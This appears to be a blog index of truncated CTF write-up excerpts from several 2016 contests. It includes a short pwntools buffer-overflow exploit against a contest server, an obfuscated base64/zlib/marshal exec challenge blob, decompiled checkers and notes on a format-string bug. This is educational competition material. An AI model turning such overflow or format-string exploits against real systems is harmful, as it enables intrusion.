HITCON CTF 2016::Handcrafted::Rev-50

Filed under HITCON CTF 2016.

We were given a Python file for this challenge:

    #!/usr/bin/env python
    # -*- coding: utf-8 -*-
    import marshal, zlib, base64
    exec(marshal.loads(zlib.decompress(base64.b64decode('eJyNVktv00AQXm/eL0igiaFA01IO4cIVCUGFBBJwqRAckLhEIQmtRfPwI0QIeio/hRO/hJ/CiStH2M/prj07diGRP43Hs9+MZ2fWMxbnP6mux+oK9xVMHPFViLdCTB0xkeKDFEFfTIU4E8KZq8dCvB4UlN3hGEsdddXU9QTLv1eFiGKGM4cKUgsFCNLFH7dFrS9poayFYmIZm1b0gyqxMOwJaU3r6xs9sW1ooakXuRv+un7Q0sIlLVzOCZq/XtsK2oTSYaZlStogXi1HV0iazoN2CV2HZeXqRQ54TlJRb7FUlKyUatISsdzo+P7UU1Gb1POdMruckepGwk9tIXQTftz2yBaT5JQovWvpSa6poJPuqgao+b9l5Aj/R+mLQIP4f6Q8Vb3g/5TB/TJxWGdZr9EQrmn99fwKtTvAZGU7wzS7GNpZpDm2JgCrr8wrmPoo54UqGampFIeS9ojXjc4E2yI06bq/4DRoUAc0nVnng4k6p7Ks0+j/S8z9V+NZ5dhmrJUM/y7JTJeRtnJ2TSYJvsFq3CQt/vnfqmQXt5KlpuRcIvDAmhnn2E0t9BJ3SvB/SfLWhuOWNiNVZ+h28g4wlwUp00w95si43rZ3r6+fUIEdgOZbQAsyFRRvBR6dla8KCzRdslar7WS+a5HFb39peIAmG7uZTHVm17Czxju4m6bayz8e7J40DzqM0jr0bmv9PmPvk6y5z57HU8wdTDHeiUJvBMAM4+0CpoAZ4BPgJeAYEAHmgAUgAHiAj4AVAGORtwd4AVgC3gEmgBBwCPgMWANOAQ8AbwBHgHuAp4D3gLuARwoGmNUizF/j4yDC5BWM1kNvvlxFA8xikRrBxHIUhutFMBlgQoshhPphGAXe/OggKqqb2cibxwuEXjUcQjccxi5eFRL1fDSbKrUhy2CMb2aLyepkegDWsBwPlrVC0/kLHmeCBQ=='))))

After looking at the decompressed data, I realized that the header had been removed, so I compiled a pyc file and got the correct header. Here is my Get_Bytecodes.py:

    #!/usr/bin/env python
    # -*- coding:…

HITCON CTF 2016::Flame::PPC-150

Filed under HITCON CTF 2016.

This was my first encounter with Power PC, so this challenge was definitely a fun learning experience for me. Here is my best attempt at the decompiled source code.

    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int global_values[] = {0xCFE,0x859,0x95D,0x871,0x40D,6,0xADE,0xFA8,0x561,0x9DA, \
        0x878,0x682,0xFA9,0xF5F,0x25E,0xDB0,0xFBF,0xBC6,0xD38,0x95D,0xD09,0x7ED,0x307, \
        0x1C0,0x399,0x956,0xA45,0x292,0xC8A,0x92F,0x4A,0x964,0x194,0x9DA,0x11F};

    int main(){
        char input[35];
        int *checked_against = global_values;
        int i;
        //print welcome string…

TUM CTF 2016::lolcpp::pwn-250

Filed under TUM CTF 2016.

We were given the source code for this challenge.

    #include <cstdint>
    #include <cstdio>
    #include <cstdlib>
    #include <cstring>
    #include <functional>
    #include <memory>
    #include <unistd.h>

    constexpr size_t entry_len = 0x50;

    void strip_newline(char *buf, size_t size)
    {
        char *p = &size[buf];
        while (p >= buf) {
            if (0 == *p or '\n' == *p) {
                *p = 0;…

CSAW Qual 2016::Rock::Rev-100

Filed under CSAW Quals 2016.

There is a struct in this program.

    struct Rock{
        void *fp;
        int pass_fail;
        string *user_input1;
        string *user_input2;
        string *flag_str;
    };

Three interesting functions, which I have called init_struct, check_len_and_xor, and is_valid_key. See the rest of this writeup here.

CSAW Qual 2016::Warmup::Pwn-50

Filed under CSAW Quals 2016.

This was a very easy challenge. Basically, there was a win function at the address that is being printed: 0x40060D. This function can be called with a simple buffer overflow. Here is my Exploit.py:

    from pwn import *
    win = 0x40060D
    payload = "A"*72
    payload += p64(win)
    con = remote('pwn.chal.csaw.io',8000)
    print con.recvline()
    print con.recvline()…

CSAW Qual 2016::Sleeping Guard::Crypto-50

Filed under CSAW Quals 2016.

With this challenge, they gave us an encrypted PNG. After a bit of trial and error I realized all I had to do was XOR the first few bytes of the encrypted file with the standard header of a PNG. I just downloaded a sample file. Here is my get_key.py:

    ecrypted = open('sleeping.png','rb').read().decode('base64')
    png =…

MMA CTF 2016::Palindrome::Prog-50

Filed under MMA CTF 2016.

The challenge reads as follows:

Your task is to make a palindrome string by rearranging and concatenating given words.
Input Format: N …
Answer Format: Rearranged words separated by space. Each words contain only lower case alphabet characters.
Example Input: 3 ab cba c
Example Answer: ab c cba
You have to connect to ppc1.chal.ctf.westerns.tokyo:31111(TCP)…

MMA CTF 2016::Reverse Box::Rev-50

Filed under MMA CTF 2016.

I found an unintended solution to this one, so I was pretty happy about that. The contents of the flag lead me to believe that I was intended to reverse a substitution cypher. But anyways, here is my solution. It was pretty obvious that I was dealing with some kind of cypher. The most important…

MMA CTF 2016::Judgement::Pwn-50

Filed under MMA CTF 2016.

After opening the binary up in IDA, it was pretty obvious that we needed to exploit a format string vulnerability. It looks like the flag was declared as a global variable, which means it will have a static address in the .bss section. This definitely makes our lives easier. See the full writeup here.